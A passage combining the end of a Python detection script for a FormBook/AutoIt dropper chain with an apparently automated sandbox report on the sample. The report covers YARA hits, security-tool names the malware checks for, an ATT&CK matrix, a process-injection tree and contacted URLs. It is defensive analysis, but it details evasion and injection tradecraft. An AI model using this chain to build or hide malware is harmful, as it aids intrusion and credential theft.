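              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    # Benign control (assumed): a user-run script from Documents that must not fire.
    ProcEvent(600, 1, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Documents\backup.vbs"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
EXEC_EXTS = {".exe", ".com", ".scr"}


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def first_arg_after_c(cmdline: str) -> str:
    """Return the first token following 'cmd /c', or '' if there is none."""
    low = cmdline.lower()
    if " /c " not in low:
        return ""
    tokens = low.split(" /c ", 1)[1].split()
    return tokens[0] if tokens else ""


def detect(events):
    """Return (rule, pid) pairs for events matching the chain's telltales."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = basename(e.image)
        low = e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # Script host executing a script dropped under %LOCALAPPDATA%\Temp.
        if name in SCRIPT_HOSTS and "\\appdata\\local\\temp\\" in low:
            hits.append(("script_host_from_temp", e.pid))
        if pname in SCRIPT_HOSTS and name == "cmd.exe":
            # Script-driven network reset around the payload launch.
            if "ipconfig /release" in low or "ipconfig /renew" in low:
                hits.append(("script_host_resets_network", e.pid))
            # cmd /c running a file whose extension is not executable (.mp2 here).
            ext = ntpath.splitext(first_arg_after_c(e.cmdline))[1]
            if ext and ext not in EXEC_EXTS:
                hits.append(("cmd_runs_non_exe_extension", e.pid))
        # A .NET utility spawned by a parent not even named like an executable.
        if name in DOTNET_HOSTS and parent and ntpath.splitext(pname)[1] not in EXEC_EXTS:
            hits.append(("dotnet_host_from_non_exe_parent", e.pid))
    return hits


def lineage(events, pid: int):
    """Walk ppid links back to the root and return image names root-first."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:34s} pid={pid}  {' -> '.join(lineage(EVENTS, pid))}")
```

                The parent-child checks are what make this robust against simple renaming: the .mp2 extension and the Temp path are the attacker's choices, but a script host spawning cmd.exe to reset the adapter, and a .NET utility whose parent is not an .exe, are structural features of the chain that survive a new file name.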

                Language, Device and Operating System Detection

                Source: Yara match; File source: Process Memory Space: dmqiuorkt.mp2 PID: 1212, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: dmqiuorkt.mp2.exe PID: 6808, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: dmqiuorkt.mp2.exe PID: 2788, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: dmqiuorkt.mp2.exe PID: 6900, type: MEMORYSTR
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_00266694 cpuid
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_0025FD34 GetLocaleInfoW,GetNumberFormatW
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_0026454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_008AE5F8 GetUserNameW
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_0088BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_002503BE GetVersionExW
                Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796813418.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812580300.00000000017A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
                Source: dmqiuorkt.mp2.exe, 0000000F.00000002.1812528985.000000000178A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796778234.0000000001787000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796448815.000000000171E000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796704888.0000000001763000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796756582.0000000001778000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796731783.0000000001772000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1805768417.0000000001789000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796647501.0000000001720000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238224819.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796813418.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812580300.00000000017A4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342513121.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262888317.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262539835.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262757418.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262623069.0000000000D51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVGUI.exe
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

                Stealing of Sensitive Information

Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: dmqiuorkt.mp2.exe | Binary or memory string: WIN_81
Source: dmqiuorkt.mp2.exe | Binary or memory string: WIN_XP
Source: dmqiuorkt.mp2.exe0.7.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: dmqiuorkt.mp2.exe | Binary or memory string: WIN_XPe
Source: dmqiuorkt.mp2.exe | Binary or memory string: WIN_VISTA
Source: dmqiuorkt.mp2.exe | Binary or memory string: WIN_7
Source: dmqiuorkt.mp2.exe | Binary or memory string: WIN_8

                Remote Access Functionality

Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008D2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 7_2_008D2163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008D1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 7_2_008D1B61
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003B2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 15_2_003B2163
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003B1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 15_2_003B1B61
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (1) | Valid Accounts (2) | Native API (1) | Scripting (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (1) | Input Capture (21) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Input Capture (21) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Valid Accounts (2) | Valid Accounts (2) | Obfuscated Files or Information (2) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Clipboard Data (3) | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Registry Run Keys / Startup Folder (1) | Access Token Manipulation (21) | Software Packing (1) | NTDS | System Information Discovery (27) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (512) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (261) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (1) | Masquerading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (12) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts (2) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (12) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (21) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (512) | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1569431 | Sample: FX6KTgnipP.exe | Start date: 05/12/2024 | Architecture: WINDOWS | Score: 100
Signatures on the start node: Multi AV Scanner detection for submitted file; Yara detected Autoit Injector; Yara detected FormBook; 8 other signatures

Process tree (reconstructed from the behavior graph):

FX6KTgnipP.exe
  dropped: C:\Users\user\AppData\Local\...\dmqiuorkt.mp2 (PE32); C:\Users\user\AppData\Local\Temp\...\isci.vbe (Unicode)
  signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  started: wscript.exe
    signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    started: cmd.exe
      started: dmqiuorkt.mp2
        dropped: C:\Users\user\AppData\...\dmqiuorkt.mp2.exe (PE32); C:\Users\user\AppData\Local\...\dmqiuorkt.mp2 (PE32); C:\Users\user\AppData\...\dmqiuorkt.mp2.exe (PE32); C:\Users\user\AppData\Local\...\tdggoffi.bin (Unicode)
        signatures: Found API chain indicative of sandbox detection; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures
        started: RegSvcs.exe
          signatures: Maps a DLL or memory area into another process
          started: dmqiuorkt.mp2.exe
            signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
            started: UserAccountControlSettings.exe
              signatures: Maps a DLL or memory area into another process
              injected: explorer.exe
            started: RegSvcs.exe
              started: WerFault.exe
            started: RegSvcs.exe
        started: RegSvcs.exe
      started: conhost.exe
    started: cmd.exe
      signatures: Uses ipconfig to lookup or modify the Windows network settings
      started: conhost.exe
      started: ipconfig.exe
    started: cmd.exe
      started: conhost.exe
      started: ipconfig.exe
dmqiuorkt.mp2.exe
  dropped: C:\Users\user\...\dmqiuorkt.mp2.exe.exe (PE32)
  signatures: Found API chain indicative of sandbox detection; Contains functionality to inject code into remote processes; Writes to foreign memory regions
  started: RegSvcs.exe
  started: RegSvcs.exe
dmqiuorkt.mp2.exe
  signatures: Allocates memory in foreign processes; Injects a PE file into a foreign processes
  started: RegSvcs.exe
  started: RegSvcs.exe

Source | Detection | Scanner | Label | Link
FX6KTgnipP.exe | 71% | ReversingLabs | Win32.Trojan.Runner |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2 | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe.exe | 0% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | Avira URL Cloud | safe |
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/bat | explorer.exe, 00000020.00000000.3696594073.000000000899E000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.stacker.com/arizona/phoenix | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000020.00000002.3828546471.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://excel.office.com | explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.micro | explorer.exe, 00000020.00000002.3831910075.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.3681722704.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.3695089106.00000000082D0000.00000002.00000001.00040000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.autoitscript.com/autoit3/ | FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.dr | false | | high
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in- | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp( | explorer.exe, 00000020.00000000.3699860588.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://parade.com/61481/toriavey/where-did-hamburgers-originate | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch- | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com/~T | explorer.exe, 00000020.00000000.3696594073.0000000008796000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSp | explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com/rT | explorer.exe, 00000020.00000000.3696594073.0000000008796000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09 | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.autoitscript.com/autoit3/J | FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000000.1685361958.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2328145879.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe, 00000015.00000000.1940668034.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe0.7.dr | false | | high
